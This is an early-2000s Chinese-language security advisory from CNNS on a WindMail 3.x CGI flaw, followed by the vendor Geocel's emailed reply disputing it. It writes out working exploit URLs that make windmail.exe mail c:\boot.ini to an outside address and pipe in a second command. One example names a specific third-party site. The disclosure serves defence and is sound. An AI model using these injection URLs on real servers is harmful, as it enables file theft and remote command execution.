婕俺绦颍?
Windmail 3.x by http://www.geocel.com/
描述
CNNS
安全公告2000-05/CNNS发现Windmail允许用户以web身份执行指令和窃取文件
详细
WindMail是一个32位的windows应用
程序,允许用户用命令行形式发送邮件
这个
软件是geocel开发的,试用版本可以在http://www.geocel.com/download/wmail301e.exe下载
Windmail提供了通过CGI接口发送邮件的功能,也支持HTML的mail发送表单。最近发现很多server(国内用得也较多)的cgi-bin目录下有windmail.exe这个程序,本站安全技术人员PP对该程序进行了分析,结果发现,该CGI程序允许任何人读取本地硬盘上的文件,还允许用户以web
user身份执行任何指令:
http://www.xxx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20yourmail@mail.com%20|%20dir%20c:\
这个请求将使windmail.exe将c:\boot.ini发送给yourmail@mail.com,然后执行 "dir
c:\" 的指令
举一国外网站为证:
http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini%20aggressor@163.net
这将把c:\boot.ini发送到chinahack@xxx.net
同时Windmail.exe对命令参数也缺乏检查机制,允许跟随特殊字符如管道符,其后面允许跟随要执行的指令串。
该漏洞在windmail 3.05下测试通过
经本站授权, 全世界最大的
网络安全数据库Securityfocus将该发现公布在他们的网站上:
http://www.securityfocus.com/bid/1073
解决方案
我们已经提醒了供应商http://www.geocel.com/,对方作出了回应,但他们认为问题在系统管理员本身,他们没有必要修补该漏洞。
我们认为,既然windmail声称为web应用
设计了CGI的接口,则他们应该检查特殊字符和命令行的参数。
建议在不要把 windmail.exe 放在web(可执行)目录下
这是geocel的回信:
-----Original Message-----
From: Ben Camp $#@60;benc@gallerywatch.com$#@62;
To: frankie@CNNS.NET $#@60;frankie@CNNS.NET$#@62;
CC: pp@cnns.net
Date: 2000年3月28日 23:56
Subject: windmail bugtraq
This is in your numbering system.
1. Thanks for letting me know this got all the way to bugtraq.
pp@CNNS.NET
decided to ignore any responses to his earlier message.
2. I certain do not have a problem with correcting any problems,
but Im
not seeing the security problem here with WindMail. It seems
to me that
if you make all your files world-readable or run an environment
in an
administrative user contect (NT Administrator/root) then you
cannot blame
individual utilities that function according to the security
constraints
you put them in.
"Workaround: Set up the webserver to run under an account
that only has
read access to files that are meant to be publicly accessed"..
Is this a
workaround, or what one should do before they start blaming
tools that have
no control over the matter? He also has this in his cgi-bin
directory
which would let the webserver execute it directly instead
of in the default
installation directory outside of the web root.
So here are my questions so we are clear:
1. If you have (mis)configured your machine to allow read
access to all
files, then how is this a problem with WindMail?
2. What is WindMail doing that it should not given the security
constraints
it is under?
3. What are your recommendations for how WindMail should act
differently
and under which circumstances?
Thanks,
Ben Camp
benc@geocel.com
Geocel International
